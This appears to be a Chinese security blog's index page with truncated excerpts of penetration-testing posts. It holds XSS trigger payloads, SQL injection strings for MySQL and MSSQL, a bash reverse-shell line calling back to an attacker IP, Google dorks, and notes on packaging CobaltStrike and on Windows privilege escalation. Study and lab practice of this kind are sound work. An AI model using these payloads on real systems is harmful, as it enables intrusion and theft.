关于Mac app打包[二]
经过连续多日的艰苦奋斗,俺终于摸到了门 生成app 首先 创建一个文件夹 app 进入文件夹 把要用到的全部复制进去 接着运行命令 jpackage 生成 app (注意有$符号需要反斜杠) 1234567jpackage --name CobaltStrike --input . \--main-jar CobaltStrike.jar \--type dmg \--app-version "4.2" \--copyright "Xrsec" \--description "CobaltStrike with JDK and Chinese. Mac zulu-Jdk15 CobaltStrike 4.2" \--icon app.icns --java-options "-javaagent:\$APPDIR/CobaltStrikeCN.jar -Dfile.encoding=utf-8 -XX:ParallelGCThreads=4 -XX:+AggressiveHeap...
Mac M1 实用技术方案
🧬Home-brew 升级3.0取消终端Rosetta🎁 首相找到终端app –> 显示简介 –> 取消Rosetta 重新安装Home-brew 🎁 重新启动终端app ->> 打开你的 Clash 复制终端 酸酸乳 123456789export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890# 卸载 homebrew/bin/bash -c "$(curl -fsSL https://cdn.jsdelivr.net/gh/Homebrew/install@master/uninstall.sh)"# 你也可以选这强制删掉homebrew# which brew# cd# sudo rm-rf homebrew/bin/bash -c "$(curl -fsSL...
搜索引擎信息收集
转载自 Norah C.IV Google是一款功能强大的搜索引擎,能够根据robots协议抓取互联网上几乎所有页面,其中包括大量账号密码等敏感信息。GHDB(Google Hacking Database)存放了大量敏感信息,Google Hacking是指利用Google等搜索引擎搜索信息来进行入侵的技术和行为,攻击者利用搜索引擎高级指令能够轻松获取指定的敏感信息。以下是利用GHDB结合搜索引擎高级指令进行敏感信息获取的对应表: 1、搜索特殊的文件后缀在此过程中,测试人员会对域进行如下内容的搜索: 搜索内容 说明 site:test.com inurl:jsp.bak 搜索站点中是否存在后缀为jsp.bak的文件,即某些jsp的备份文件 site:test.com filetype:sql 搜索站点中是否存在SQL脚本文件 site:test.com inurl:log 搜索站点中是否存在应用程序日志文件,如ftp日志、oracle日志等 site:test.com...
web渗透测试清单
转载自 Norah...
HTTP请求码对照表
转载自 Norah C.IV Status Code状态码详解对照表 状态码 含义 100 客户端应当继续发送请求。这个临时响应是用来通知客户端它的部分请求已经被服务器接收,且仍未被拒绝。客户端应当继续发送请求的剩余部分,或者如果请求已经完成,忽略这个响应。服务器必须在请求完成后向客户端发送一个最终响应。 101 服务器已经理解了客户端的请求,并将通过Upgrade 消息头通知客户端采用不同的协议来完成这个请求。在发送完这个响应最后的空行后,服务器将会切换到在Upgrade 消息头中定义的那些协议。 只有在切换新的协议更有好处的时候才应该采取类似措施。例如,切换到新的HTTP 版本比旧版本更有优势,或者切换到一个实时且同步的协议以传送利用此类特性的资源。 102 由WebDAV(RFC 2518)扩展的状态码,代表处理将被继续执行。 200 请求已成功,请求所希望的响应头或数据体将随此响应返回。 201 请求已经被实现,而且有一个新的资源已经依据请求的需要而建立,且其 URI 已经随Location...
XSS触发语句
转载自 Norah C.IV 一、标准语句1<script>alert(/XSS/)</script> 二、尝试大小写1<sCript>alert(1)</scRipt> 三、使用<img>标签123456789101、windows事件<img src="x" onerror=alert(1)><img src="1" onerror=eval("alert('xss')")>//图片加载错误时触发2、鼠标事件<img src=1 onmouseover="alert(1)">//鼠标指针移动到元素时触发<img src=1 onmouseout="alert(1)">//鼠标指针移出时触发 四、使用<a>标签12345671、使用href属性<a...
UPnP协议
转载自 Norah C.IV更多:SSDP协议 SOAP协议 一、UPnP简介通用即插即用(英语:Universal Plug and Play,简称UPnP)是由“通用即插即用论坛”(UPnP™ Forum)推广的一套网络协议,主要用于设备的智能互联互通。 UPnP 可以当作是一个相对复杂的网络协议,毕竟它包含了很多其他的网络协议,如:ip(设备寻址)、tcp、udp(数据打包发送)、http(数据传递格式)等。 UPnP 可以扩展,也就是说还可以在启动加入其他的协议,比如:传递数据时,http协议再包一层json协议,或者数据传递使用xml协议来传递等等。 UPnP 之所以强大,很大一个原因是基于互联网,这样对等设备可以通过互联网自由交互,也就是说任何可以联网的设备都可以使用UPnP协议。 二、UPnP用法(1)寻址——Addressing因为基于互联网,需要满足基本的p2p协议,所以就必须要寻址,寻址的过程就是设备获取ip地址的过程,这个里面一般都使用DHCP(Dynamic Host Configuration...
渗透工具和查询平台
转载自 Norah...
反弹shell的各种姿势
转载自 Norah C.IV转载自 Bypass 在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。本文所有姿势整理自网络,并基于同一个假设的前提下完成测试和验证。(假设:攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。) Linux 反弹shell姿势一:bash反弹12bash -i >& /dev/tcp/192.168.99.242/1234 0>&1base64版:bash -c...
SQL手工注入总结
转载自 Norah C.IV转载自 乌雲安全 虽说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要。本文主要把以前学过的知识做个总结,不会有详细的知识解读,类似于查询手册的形式,便于以后的复习与查阅,文中内容可能会存在错误,望师傅们斧正! 0x01 Mysql 手工注入1.1 联合注入123?id=1' order by 4--+?id=0' union select 1,2,3,database()--+?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+?id=0' union select 1,2,3,group_concat(column_name) from information_schema.columns where...
Web常见漏洞描述及修复建议
转载自 Norah C.IV转载自...
Windows提权总结
转载自 Norah C.IV转载自 ShAun 0x01 简介提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。 Windows常用的提权方法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、WEB中间件漏洞提权、DLL劫持提权、滥用高危权限令牌提权、第三方软件/服务提权等 0x02 按提权方法分类2.1 系统内核溢出漏洞提权此提权方法即是通过系统本身存在的一些漏洞,未曾打相应的补丁而暴露出来的提权方法,依托可以提升权限的EXP和它们的补丁编号,进行提升权限。 下面是几个方便查找相应补丁漏洞的辅助查询页面: 123456789101112Copyhttps://github.com/ianxtianxt/win-exp-https://github.com/SecWiki/windows-kernel-exploitsCopy#手工查找补丁情况systeminfoWmic qfe get...
常用端口信息
转载自 Norah C.IV 通过扫描服务器开放的端口以及从该端口判断服务器上存在的服务,就可以对症下药,便于渗透目标服务器。 所以在端口渗透信息的收集过程中,需要关注常见应用的默认端口和在端口上运行的服务。最常见的扫描工具就是Nmap,无状态端口扫描工具Masscan、ZMap和御剑高速TCP端口扫描工具。 常见的端口及其说明,以及攻击方向汇总如下: 文件共享服务端口: 端口号 端口说明 攻击方向 21/22/69 FTP/TFTP文件传输协议 允许匿名的上传、下载、爆破和嗅探操作 2049 Nfs服务 配置不当 139 Samba服务 爆破、未授权访问、远程代码执行 389 Ldap目录访问协议 注入、允许匿名访问、弱口令 远程连接服务端口: 端口号 端口说明 攻击方向 22 SSH远程连接 爆破、SSH隧道及内网代理转发、文件传输 23 Telnet远程连接 爆破、嗅探、弱口令 3389 Rdp远程桌面连接 Shift后门(需要Windows Server...
注入常用SQL语句整理
MSSQL很多情况下使用工具对mssql注入并不完善,所以我们就需要手工注入,一下是本人收集的一些mssql的sql语句. 手工MSSQL注入常用SQL语句 12345678910111213141516171819202122and exists (select * from sysobjects) //判断是否是MSSQLand exists(select * from tableName) //判断某表是否存在..tableName为表名and 1=(select @@VERSION) //MSSQL版本And 1=(select db_name()) //当前数据库名and 1=(select @@servername) //本地服务名and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员and 1=(Select IS_MEMBER('db_owner')) //判断是否是库权限and 1= (Select...
延时注学习
SQL盲注:基于时间延迟注入 靶场环境搭建 所需软件Phpstudy2016,sql注入靶场文件 Phpstduy 官网下载地址:https://www.xp.cn/sql注入靶场下载地址:https://github.com/Audi-1/sqli-labs 下载安装 phpstudy,下载sql注入靶场文件压缩包, 解压文件靶场环境文件,放到 phpstudy 文件目录下的 WWW 文件夹下, 然后运行 phpstudy然后访问,http://localhost/,或者 http://127.0.0.1点击 Setup/reset Database for labs 选项安装靶场数据库等文件出现这个就说明安装完成 返回访问 http://127.0.0.1 主页就行 对照 ascii 表 控制字符 ASCII 值 控制字符 ASCII 值 控制字符 ASCII...